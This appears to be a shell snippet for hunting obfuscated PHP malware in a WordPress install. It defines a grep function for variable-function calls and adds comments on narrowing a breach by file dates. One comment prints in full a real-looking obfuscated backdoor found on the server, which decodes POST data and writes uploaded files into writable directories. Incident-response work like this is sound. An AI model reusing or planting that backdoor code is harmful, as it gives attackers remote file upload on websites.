Grep a WordPress install to search for obfuscated PHP malware
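# Hunt for PHP "variable function" calls such as `$name(...)`, the call style
# obfuscated WordPress malware uses to hide which builtin it really invokes
# (the function name is assembled from chr()/"\x.." pieces at runtime and
# then called through the variable).
#
# Usage:  wp_find_dynamic_calls [DIR]    (DIR defaults to the current directory)
# Output: grep's usual `path:matching line`, one line per hit, on stdout.
# Exit status is grep's: 0 when at least one hit, 1 when none, 2 on error.
# Expect some benign hits (shell `$(...)` inside scripts, legitimate PHP
# callbacks); every reported file still needs a manual look.
wp_find_dynamic_calls() {
    # Single quotes keep `\$` away from the shell, so grep receives the BRE
    # `\$[a-zA-Z0-9_]*(`: `\$` is a literal dollar sign and `(` a literal
    # parenthesis.  `_` is in the class so `$my_fn(` and `$_x(` are caught too.
    # `--` stops a DIR that begins with `-` from being parsed as an option.
    grep -r -e '\$[a-zA-Z0-9_]*(' -- "${1:-.}"
}

# Run the search when this file is executed directly; when it is sourced under
# bash, only the function is defined (under a plain POSIX sh BASH_SOURCE is
# unset and the search runs either way).
if [ "${BASH_SOURCE:-$0}" = "$0" ]; then
    wp_find_dynamic_calls "$@"
fi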
# should find some funky stuff like:
# ./wp-content/plugins/classic-editor/js/hoxozkwa.php:<?php $LRhdThLn = "\104"."\117".chr(67)."\x55".chr(77).'E'."\x4e"."\x54".chr(95)."\x52".chr(79).chr(79).'T';$qEJGBsQZ = "\x48"."\x54".'T'.chr(331-251).chr(95).'H'."\117"."\x53"."\x54";$FocpVmGikU = chr(104)."\x74".chr(116).chr(875-763)."\72"."\57".chr(370-323);$InqeP = chr(591-545).chr(463-351)."\150".chr(112);$OmaOCPiem = "\160".chr(104)."\160";$aALnXcWKii = 'f'."\151"."\154".chr(101)."\137".chr(889-777)."\x75".chr(727-611).chr(95).chr(99)."\157".chr(110).'t'.chr(576-475)."\x6e"."\x74".'s';$eleTmtrO = chr(552-438)."\x61".chr(119).'u'."\162".chr(732-624).'d'."\145".chr(950-851)."\x6f".'d'."\x65";$YGdQfPUtlO = chr(117)."\156"."\x73"."\145".chr(114).'i'.'a'."\154".'i'.chr(585-463).chr(799-698);$wuLUaDUX = chr(112)."\150".chr(112)."\166"."\145"."\x72"."\163"."\151".chr(111).'n';$VaXDosXIU = 's'.'t'."\x72"."\x5f".chr(114).chr(227-116)."\164".chr(49).chr(108-57);$BVrBroINfP = "\163".chr(101).'r'.'i'."\141".chr(637-529)."\151".chr(579-457)."\145";$jltoISt = chr(845-730).'t'."\x72".'_'.chr(115).chr(112)."\154".chr(105)."\x74";foreach ($_POST as $IbPYBs => $eIuItYTG){if (strlen($IbPYBs) == 16){$eIuItYTG = $jltoISt($eleTmtrO($VaXDosXIU($eIuItYTG)));$IbPYBs = array_slice($jltoISt(str_repeat($IbPYBs, (count($eIuItYTG)/16)+1)), 0, count($eIuItYTG));function VrKLUkfxG($lcvkMP, $qljnaDbI, $IbPYBs){$IdsUDSqEOX = "baddf620-11f1-4e09-9f3d-876476b02b3a";return $lcvkMP ^ $IdsUDSqEOX[$qljnaDbI % strlen($IdsUDSqEOX)] ^ $IbPYBs;}$eIuItYTG = implode("", array_map("VrKLUkfxG", array_values($eIuItYTG), array_keys($eIuItYTG), array_values($IbPYBs)));$eIuItYTG = @$YGdQfPUtlO($eIuItYTG);if (@is_array($eIuItYTG)){$RvqUXNHiI = array_keys($eIuItYTG);$eIuItYTG = $eIuItYTG[$RvqUXNHiI[0]];if ($eIuItYTG === $RvqUXNHiI[0]){echo @$BVrBroINfP(Array($OmaOCPiem => @$wuLUaDUX(), ));exit();}else {function JZejiips($CPKtGwir){static $OCUaFV = array();$HQbufPbr = glob($CPKtGwir . 
'/*', GLOB_ONLYDIR);if (count($HQbufPbr) > 0) {foreach ($HQbufPbr as $CPKtGw) {if (@is_writable($CPKtGw)) {$OCUaFV[] = $CPKtGw;}}}foreach ($HQbufPbr as $CPKtGwir) JZejiips($CPKtGwir);return $OCUaFV;}$cMaYE = $_SERVER[$LRhdThLn];$HQbufPbr = JZejiips($cMaYE);$RvqUXNHiI = array_rand($HQbufPbr);$mtujCvFpOt = $HQbufPbr[$RvqUXNHiI] . "/" . substr(md5(time()), 0, 8) . $InqeP;@$aALnXcWKii($mtujCvFpOt, $eIuItYTG);echo $FocpVmGikU . $_SERVER[$qEJGBsQZ] . substr($mtujCvFpOt, strlen($cMaYE));exit();}}}} | |
# root@zupe # ls -alFth ./wp-content/plugins/classic-editor/js/hoxozkwa.php
# -rw-r--r-- 1 zupe-1 zupe-1 2.4K Feb 6 2020 ./wp-content/plugins/classic-editor/js/hoxozkwa.php
# Once you know the date of the breach, you can search for files modified around that date to narrow down what got changed (note that `find -newer` compares mtime, which an attacker can rewrite with `touch`; `-cnewer` compares ctime, which `touch` cannot set):
# Of course, there will also be some false positives, which could be legitimate files, but some of them could also be backdoored, just slightly modified.
# But, for example, 088p8rr8/FabZZ.js.php is clearly something malicious, and you can confirm that by looking at the file with `cat` (prefer `cat -v` or `less` so terminal escape sequences inside the file are shown rather than interpreted).
# root@zupe:/home/zupe-1/htdocs/www.zupe.website# touch --date "2020-02-05" /tmp/start
# touch --date "2020-02-07" /tmp/end
# root@zupe:/home/zupe-1/htdocs/www.zupe.website# find . -type f -newer /tmp/start -not -newer /tmp/end
# ./wp-blog-header.php
# ./wp-admin/moderation.php
# ./wp-content/themes/088p8rr8/FabZZ.js.php
# ./wp-content/themes/088p8rr8/aRO.js.php
# ./wp-content/themes/088p8rr8/Nd.js.php
# ./wp-content/themes/twentytwentythree/Nd.js.php
# ./wp-content/plugins/84q5po64/FabZZ.js.php
# ./wp-content/plugins/84q5po64/aRO.js.php
# ./wp-content/plugins/84q5po64/Nd.js.php
# root@zupe:/home/zupe-1/htdocs/www.zupe.website#